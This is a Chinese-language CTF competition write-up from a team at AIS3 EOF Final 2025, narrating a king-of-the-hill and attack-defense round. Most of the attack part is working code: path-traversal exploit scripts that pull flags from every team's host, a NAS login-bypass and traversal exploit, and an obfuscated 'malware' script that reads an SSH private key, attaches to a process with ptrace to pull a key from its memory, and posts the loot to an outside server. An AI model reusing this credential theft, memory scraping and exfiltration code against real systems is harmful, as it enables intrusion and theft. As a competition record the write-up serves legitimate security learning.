AIS3 EOF Final 2025 - Record

Author: 堇姬Naup

前言

Team: CakeisTheFake
Rank: r.k.2 & 炸彈超人獎

遲來的 EOF 心得 www

先感謝 CakeisTheFake 的所有隊友,一起奮戰了兩天,這邊簡單記錄這次比賽

Day 1

一開始先釋出了 BOMBE、game 兩題 KoH
先來說說 BOMBE
每隊都要上傳 malware 及 EDR
malware 要做三件事

  • 從 /home/bogay1450/.ssh/id_ed25519 檔案內容取得 flag
  • 從 process /usr/bin/bogay_backdoor 的 memory register 取得 flag
  • 從 flag server 的 api 取得 flag

ERD 要抓出 malware 的 process cmdline 中第一個匹配到的 md5 hash

另外一題 game 是一個遊戲,場上有寶箱等

一開始會遇到一些問題,像是一開始會讓玩家輸入 token,但卻沒辦法用 ctrl c + ctrl v
原因是最近由 orange 和 splitline 發現的轉碼問題導致
總之一開始解決方法就是寫了個執行後隔兩秒自己打字的執行檔

這題拿分的方式有好幾種
像是 走路、攻擊、殺人、完成任務

任務有以下,可以獲得最高分 10000

  • Set the value of register R1 to NON-ZERO
  • Set the value of register R9 to NON-ZERO
  • Set the value of register R3 to NON-ZERO
  • Set the value of register R1 to 0x107877a2
  • Set the value of register R5 to 0xce2c0eb9
  • Set the value of register R4 to 0x1a94c37

開寶箱可以獲得 bytes,要組合設定
不過我們一直無法拆開 pyc
導致我們一直看不懂這個把 register 設為對應值的任務在幹嘛…

以後要拆記得用這個
https://pylingual.io/

不過我們在這題仍拿到第二高是為甚麼呢
原因是我們瘋狂走路www

因為沒有 source code,所以直接去抓封包看怎麼移動的
之後通過送移動封包來賺走路分

(走路鍵是壞的,通過送封包才可以準確的移動)

就這樣一路與其他隊伍拉開差距

PS: 這邊跟主辦方道歉我們一直送流量www

再來是釋出了 A&D 兩題 aiscop3、aiscop3 nas

第一題有個 path traversal
http://10.102.1.60:8080/api/image?filename=gpd.png../../../../../etc/passwd

在看一下 Dockerfile 和給的 .xlsx 知道 flag 在哪直接寫腳本讀 flag 送 flag 就好了

attack exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import subprocess
import re
import requests
import json


target_url = "http://35.221.181.38:8888/flag/"
token = "298956eca545bc623493bac595eb72e1"  

for i in range(1, 13):
    print(i)
    if i == 4:
        continue
    url = f"http://10.102.{i}.60:8080/api/image?filename=gpd.png../../../../../var/run/excel-pay/aiscop3/products.xlsx"

    result = subprocess.run(
        ['curl', '-i', url, '--output', '-'],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )

    stdout_data = result.stdout.decode('utf-8', errors='ignore')


    pattern = r"EOF[a-zA-Z0-9]{29}"

    match = re.search(pattern, stdout_data)

    if match:

        flag = match.group(0)
        print(f"找到的 Flag: {flag}", flush=True)


        payload = {
            "flags": [flag],
            "token": token
        }


        response = requests.post(target_url, json=payload)

        print(response.text)

        if response.status_code == 200:
            print(f"Flag 已成功提交到 {target_url}")
        else:
            print(f"ERR: {response.status_code}")
    else:
        print("沒有找到匹配的結果")

這題的 waf 是 lua,寫了半天還是沒寫出好的 patch 可以擋住攻擊
就這樣靠著這腳本在第一天穩定拿分

第二題則是一直都沒找到入口,也沒辦法看封包
所以就一直擱置到隔天

malware 第一天基本上大家都停留在簡單的字串相加等混淆
edr 則是檢測 flag1 字串www

寫了幾版後就去看其他題目了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
""#4
__all__ =[]#6
class OOO000OO0OOO0O0O0 :#8
    ""#9
    def __init__ (OOO0OO0O000O00000 ,OOOOOOOOO000O0000 ):#11
        OOO0OO0O000O00000 .__O0O0OO0O0OOO0O0O0 =OOOOOOOOO000O0000 #13
        OOO0OO0O000O00000 .__O00OO0OO000O00O00 =0 #14
        OOO0OO0O000O00000 .__O000O0000O00OOO0O ()#15
    def __O000O0000O00OOO0O (O000OO0OO0OOO00O0 ):#17
        ""#18
        OOOOOO00OO000O000 =[-1 ]*O000OO0OO0OOO00O0 .__O0O0OO0O0OOO0O0O0 #19
        O000OO0OO0OOO00O0 .__O000OO0OO0O000O0O (OOOOOO00OO000O000 ,0 )#20
        print ("Found",O000OO0OO0OOO00O0 .__O00OO0OO000O00O00 ,"solutions.")#21
    def __O000OO0OO0O000O0O (OOO0OO00OO0OOOOO0 ,O00000O00OOOO000O ,O0OO0O0O000OO0000 ):#23
        ""#28
        if O0OO0O0O000OO0000 ==OOO0OO00OO0OOOOO0 .__O0O0OO0O0OOO0O0O0 :#30
            OOO0OO00OO0OOOOO0 .__OO00O00O0O0000000 (O00000O00OOOO000O )#31
            OOO0OO00OO0OOOOO0 .__O00OO0OO000O00O00 +=1 #32
        else :#33
            for O0OOO00O00O0OO00O in range (OOO0OO00OO0OOOOO0 .__O0O0OO0O0OOO0O0O0 ):#35
                if OOO0OO00OO0OOOOO0 .__OO0OO0O00OO0OO0OO (O00000O00OOOO000O ,O0OO0O0O000OO0000 ,O0OOO00O00O0OO00O ):#37
                    O00000O00OOOO000O [O0OO0O0O000OO0000 ]=O0OOO00O00O0OO00O #38
                    OOO0OO00OO0OOOOO0 .__O000OO0OO0O000O0O (O00000O00OOOO000O ,O0OO0O0O000OO0000 +1 )#39
    def __OO0OO0O00OO0OO0OO (O000OO000000O00OO ,O00OOOOO0O000O0OO ,OO0O0000OOO0O000O ,O000000O000OOO000 ):#42
        ""#46
        for O00OO0O00O0OOOOO0 in range (OO0O0000OOO0O000O ):#47
            if O00OOOOO0O000O0OO [O00OO0O00O0OOOOO0 ]==O000000O000OOO000 or O00OOOOO0O000O0OO [O00OO0O00O0OOOOO0 ]-O00OO0O00O0OOOOO0 ==O000000O000OOO000 -OO0O0000OOO0O000O or O00OOOOO0O000O0OO [O00OO0O00O0OOOOO0 ]+O00OO0O00O0OOOOO0 ==O000000O000OOO000 +OO0O0000OOO0O000O :#50
                return False #52
        return True #53
    def __OO00O00O0O0000000 (O00O0OOO00O000O00 ,OO0OOO00OO0OOO000 ):#55
        ""#56
        for OO0O000OO00OOO0OO in range (O00O0OOO00O000O00 .__O0O0OO0O0OOO0O0O0 ):#57
            O0OO0O0O000O00O00 =""#58
            for OOOO000OOOO0000O0 in range (O00O0OOO00O000O00 .__O0O0OO0O0OOO0O0O0 ):#59
                if OO0OOO00OO0OOO000 [OO0O000OO00OOO0OO ]==OOOO000OOOO0000O0 :#60
                    O0OO0O0O000O00O00 +="Q "#61
                else :#62
                    O0OO0O0O000O00O00 +=". "#63
            print (O0OO0O0O000O00O00 )#64
        print ("\n")#65
    def __O0000OO000O00OOO0 (O0O0O0OO000OO000O ,O000OO0O000OO0OO0 ):#67
        ""#71
        O0OO0O000O0O00O0O =""#72
        for OO0OOOOO0O0OOO00O in range (O0O0O0OO000OO000O .__O0O0OO0O0OOO0O0O0 ):#73
            O0OO0O000O0O00O0O +=str (O000OO0O000OO0OO0 [OO0OOOOO0O0OOO00O ])+" "#74
        print (O0OO0O000O0O00O0O )#75
def O000OOOO00O0O0O0O ():#77
    ""#78
    OOO000OO0OOO0O0O0 (8 )#79
if __name__ =="__main__":#81
    O000OOOO00O0O0O0O ()#83
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/bin/python

import sys
import os
import time
import base64
import json
import requests
import psutil
import ptrace.debugger

# 混淆 flag_server 與 token
_flag_x = lambda: ''.join(chr(c ^ 42) for c in [102, 108, 97, 103, 45, 115, 101, 114, 118, 101, 114])
_tok_x = lambda: os.environ[''.join([chr(c) for c in [82, 69, 68, 95, 84, 79, 75, 69, 78]])]

def _sbmt(fl4g):
    print(requests.post(f'http://{_flag_x()}/' + base64.b64decode("c3VibWl0").decode(), 
                         headers={'Content-Type': 'text/plain', 'Cookie': f'token={_tok_x()}'}, data=fl4g).text)

def _flg1():
    with open('/home/' + base64.b64decode("Ym9nYXkxNDUw").decode() + '/.ssh/' + base64.b64decode("aWRfZWQyNTUxOQ==").decode(), 'r') as f:
        _f = f.read()
    print('fl4g1=' + _f)
    _sbmt(_f)

def _flg2():
    for _pid in psutil.pids():
        _p = psutil.Process(_pid)
        try:
            _exe = _p.exe()
        except:
            continue
        if _exe == '/' + base64.b64decode("dXNyL2Jpbg==").decode() + '/' + 'bogay_backdoor':
            _dbg = ptrace.debugger.PtraceDebugger()
            for _ in range(5):
                try:
                    _trc = _dbg.addProcess(_pid, False)
                    break
                except:
                    if _ == 4:
                        return
                    time.sleep(0.1)
            _stkmp = next(filter(lambda pm: pm.path == '[stack]', _p.memory_maps(False)))
            _top = _trc.getStackPointer()
            _btm = int(_stkmp.addr.split('-')[1], 16)
            _key = _trc.getreg('r15')
            _stk = _trc.readBytes(_top, _btm - _top)
            _pos = _stk.find(base64.b64decode("UmVhZGluZyBmbGFnIGZyb20gc3RkaW4uLi4K").decode().encode())
            _enc = _stk[_pos+32:_pos+64]
            _flag = ''
            for _ in range(0, 32, 8):
                _flag += (int.from_bytes(_enc[_:_+8], 'little') ^ _key).to_bytes(8, 'little').decode()
            print('fl4g2=' + _flag)
            _sbmt(_flag)
            break

def _flg3():
    _res = requests.post(f'http://{_flag_x()}/' + base64.b64decode("YXBpL3JlZ2lzdGVy").decode(), 
                         headers={'Content-Type': 'application/json', 'Cookie': f'token={_tok_x()}'}, json={}).text
    _msg = base64.b64decode("SW50ZXJuYWwgU2VydmVyIEVycm9yLiBQbGVhc2Ugc2VuZCB0aGUgY3Jhc2ggcmVwb3J0IHRvIHRoZSBhZG1pbmlzdHJhdG9yOiA=").decode()
    assert _res.startswith(_msg)
    _rpt = base64.b64decode(_res[len(_msg):]).decode()
    _data = json.loads(_rpt)
    _flag = _data['db']['key']
    print('fl4g3=' + _flag)
    _sbmt(_flag)

def _mn(argv):
    is_local = False
    if len(argv) >= 1:
        _ = argv[0]
        is_local = True
    if not is_local:
        time.sleep(60)
    for _f in [_flg1, _flg2, _flg3]:
        try:
            _f()
        except Exception as err:
            print(err)

if __name__ == '__main__':
    _mn(sys.argv[1:])

Day2

到了第二天我們戰術性掉出前三拿封包(?

1
2
3
4
5
6
for round in {95..100}; do
    curl -L "http://35.221.181.38:8888/pcap/4/$round" \
         -H "accept: application/json" \
         -H "Authorization: 298956eca545bc623493bac595eb72e1" \
         --output "$round.pcap" --silent --fail && echo "Downloaded: $round.pcap" || echo "Failed: $round"
done

終於找到了 NAS 入口
不過看到有 payload 就直接抄下來
登入用 user/user
2FA 沒驗證直接不理他就好了

直接讀 flag

attack exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import requests
import subprocess
import re
import requests
import json

def attack(host):
    url = f'http://{host}:5000/login.php'

    boundary = '----WebKitFormBoundary7MA4YWxkTrZu0gW'

    headers = {
        'Content-Type': f'multipart/form-data; boundary={boundary}'
    }

    data = (
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="username"\r\n\r\n'
        f'user\r\n'
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="password"\r\n\r\n'
        f'user\r\n'
        f'--{boundary}--\r\n'
    )

    sess = requests.session()
    try:
        response = sess.post(url, headers=headers, data=data, timeout=5)
    except Exception as e:
        print(f"[*] Team {i} failed")
        return ' '
    response = sess.get(f'http://{host}:5000/app.php?app=files/download&volume=public&dir=../../../..&file=fl4g', timeout=5)
    print(response.text)
    return response.text


# 目標 URL
target_url = "http://35.221.181.38:8888/flag/"
token = "298956eca545bc623493bac595eb72e1"  

for i in range(1, 13):
    host=f"10.102.{i}.60"
    print(i)
    if i == 4:
        continue

    
    stdout_data = attack(host)
    pattern = r"EOF[a-zA-Z0-9]{29}"

    match = re.search(pattern, stdout_data)

    if match:

        flag = match.group(0)
        print(f"找到的 Flag: {flag}", flush=True)

        payload = {
            "flags": [flag],
            "token": token
        }

        response = requests.post(target_url, json=payload)

        print(response.text)

        if response.status_code == 200:
            print(f"Flag 已成功提交到 {target_url}")
        else:
            print(f"error: {response.status_code}")
    else:
        print("沒有找到匹配的結果")

另外一邊 BOMBE 衝上第一了

這邊有個插曲很好笑,UPX 加殼直接搜 upx 就可以了 www

xpark

之後有空補一下 xpark 這題
這是全場唯一沒隊伍打出的 Jeopardy
當初大家都可以猜到這題要幹嘛
但逆向有些失誤跟時間不夠
所以也沒看出怎麼利用跟 exploit

after all

總之大概就這樣
最後謝謝主辦方跟隊友們,AIS3 EOF 很好玩!!!